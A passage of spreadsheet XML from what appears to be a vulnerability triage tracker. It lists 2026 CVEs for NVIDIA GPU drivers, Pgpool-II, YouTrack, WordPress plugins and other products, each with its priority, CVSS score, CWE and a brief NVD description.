      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the open-source kernel module event delivery path where an unprivileged local user could cause a use-after-free through a race between asynchronous event delivery and file close. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47598</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93495</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Improper initialization in an ASUS certain motherboard allows an physically proximate user to read or write arbitrary memory by inserting a specially crafted device.</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93495</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100275</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 stored XSS in the workflow error notification toast was possible</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100275</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92868</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>An improper certificate validation vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to bypass client certificate authentication.</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92868</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92873</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>Pgpool-II contains an incorrect implementation of an authentication algorithm, which may allow an unauthenticated attacker to promote an arbitrary watchdog node to the leader node.</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92873</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93462</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>A missing authentication for critical function vulnerability exists in baserCMS. If this vulnerability is exploited, a remote attacker may obtain sensitive information.</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93462</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96342</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Amauri.IO WPMobile.App wpappninja allows Retrieve Embedded Sensitive Data.This issue affects WPMobile.App: from n/a through 11.83.</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96342</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10726</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>2505284f-8ffb-486c-bf60-e19c1097a90b</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-73</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Cato Windows SDP Client before version 6.12.6 contains an arbitrary file disclosure vulnerability. A low-privileged local user can cause the Windows service, running as Local System, to read and disclose arbitrary local files due to improper file path validation and missing TLS certificate enforcement.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10726</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96824</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Editor Arbitrary File Deletion in Template Kit – Import &lt;= 1.0.16 versions.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96824</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97242</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>Author Arbitrary File Deletion in WEBO MCP &lt;= 3.0.18 versions.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97242</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102141</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-73</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>Two Kiteworks Core cluster-management operations did not validate file paths supplied to them, so an attacker holding root on one node of a cluster could write files as root onto another node and cause them to be executed there. Exploitation requires backend root access on a cluster node and a pending software patch present on the target node.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102141</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47509</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver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357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47509</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47515</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user could cause an out-of-bounds read via an unbounded string operation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47515</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47522</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause improper input validation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47522</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47524</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47524</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47525</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an attacker could cause an improper validation of an array index. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47525</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47527</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the firmware where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47527</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47529</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
